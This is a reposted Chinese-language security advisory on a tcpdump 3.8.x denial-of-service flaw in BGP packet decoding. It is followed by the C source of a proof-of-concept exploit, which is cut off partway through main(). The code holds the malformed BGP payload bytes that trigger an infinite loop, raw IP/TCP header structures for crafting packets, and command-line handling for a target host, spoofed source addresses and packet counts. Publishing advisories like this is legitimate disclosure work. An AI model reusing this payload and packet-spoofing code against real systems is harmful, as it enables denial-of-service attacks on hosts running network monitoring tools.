TCPDump BGP解码例程拒绝服务漏洞

2008-04-09 04:19:37来源：互联网阅读 ()

TCPDump BGP解码例程拒绝服务漏洞

发布日期：2005-04-27
更新日期：2005-04-27

受影响系统：

LBL tcpdump 3.8.x

描述：

BUGTRAQ ID: 13380

Tcpdump是一款免费的网络分析程序，适用于多种Unix操作系统。

tcpdump可能允许远程攻击者导致软件拒绝服务，起因是tcpdump解码Border Gateway Protocol (BGP)报文的方式存在漏洞。远程攻击者可以通过发送畸形的BGP报文导致软件陷入死循环。

<*来源：Vade 79 （v9@fakehalo.deadpig.org）

链接：http://marc.theaimsgroup.com/?l=bugtraq&m=111454461300644&w=2
*>

测试方法：

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <signal.h>
#include <time.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
#ifdef _USE_ARPA
#include <arpa/inet.h>
#endif

/* doesn't seem to be standardized, so... */
#if defined(__BYTE_ORDER) && !defined(BYTE_ORDER)
#define BYTE_ORDER __BYTE_ORDER
#endif
#if defined(__BIG_ENDIAN) && !defined(BIG_ENDIAN)
#define BIG_ENDIAN __BIG_ENDIAN
#endif
#if defined(BYTE_ORDER) && defined(BIG_ENDIAN)
#if BYTE_ORDER == BIG_ENDIAN
#define _USE_BIG_ENDIAN
#endif
#endif

/* will never need to be changed. */
#define BGP_PORT 179
#define DFL_AMOUNT 5
#define TIMEOUT 10

/* avoid platform-specific header madness. */
/* (just plucked out of header files) */
struct iph{
#ifdef _USE_BIG_ENDIAN
unsigned char version:4,ihl:4;
#else
unsigned char ihl:4,version:4;
#endif
unsigned char tos;
unsigned short tot_len;
unsigned short id;
unsigned short frag_off;
unsigned char ttl;
unsigned char protocol;
unsigned short check;
unsigned int saddr;
unsigned int daddr;
};
struct tcph{
unsigned short source;
unsigned short dest;
unsigned int seq;
unsigned int ack_seq;
#ifdef _USE_BIG_ENDIAN
unsigned short doff:4,res1:4,cwr:1,ece:1,
urg:1,ack:1,psh:1,rst:1,syn:1,fin:1;
#else
unsigned short res1:4,doff:4,fin:1,syn:1,
rst:1,psh:1,ack:1,urg:1,ece:1,cwr:1;
#endif
unsigned short window;
unsigned short check;
unsigned short urg_ptr;
};
struct sumh{
unsigned int saddr;
unsigned int daddr;
unsigned char fill;
unsigned char protocol;
unsigned short len;
};

/* malformed BGP data. (the bug) */
static char payload[]=
/* shortened method. (34 bytes) */
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\x00\x13\x02\x00"
"\x01\x00\xff\x00\xff\x0e\x00\xff\x00\x01"
"\x84\x00\x00\x00";
/* original method, un-comment/swap if desired. (39 bytes) */
/* "\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" */
/* "\xff\xff\xff\xff\xff\xff\x00\x13\x02\x00" */
/* "\x01\x00\xff\x00\xff\x0e\x00\xff\x00\x01" */
/* "\x84\x00\x00\x20\x00\x00\x00\x00\x00"; */

/* prototypes. (and sig_alarm) */
void bgp_connect(unsigned int);
void bgp_inject(unsigned int,unsigned int);
unsigned short in_cksum(unsigned short *,signed int);
unsigned int getip(char *);
void printe(char *,signed char);
void sig_alarm(){printe("alarm/timeout hit.",1);}

/* begin. */
int main(int argc,char **argv) {
unsigned char nospoof=0;
unsigned int amt=DFL_AMOUNT;
unsigned int daddr=0,saddr=0;
printf("[*] tcpdump[3.8.x]: (BGP) RT_ROUTING_INFO infinite loop "
"DOS.\n[*] by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)\n\n");
if(argc<2){
printf("[*] syntax: %s <dst host> [src host(0=random)] [amount]\n",
argv[0]);
printf("[*] syntax: %s <dst host> nospoof\n",argv[0]);
exit(1);
}
if(!(daddr=getip(argv[1])))
printe("invalid destination host/ip.",1);
if(argc>2){
if(strstr(argv[2],"nospoof"))nospoof=1;
else saddr=getip(argv[2]);
}
if(argc>3)amt=atoi(argv[3]);
if(nospoof){
printf("[*] target: %s\n",argv[1]);
bgp_connect(daddr);
printf("[*] done.\n");
}
else{
if(!amt)printe("no packets?",1);
printf("[*] destination\t: %s\n",argv[1]);

标签：

版权申明：本站文章部分自网络，如有侵权，请联系：west999com@outlook.com
特别注意：本站所有转载文章言论不代表本站观点，本站所提供的摄影照片，插画，设计作品，如需使用，请与原作者联系，版权归原作者所有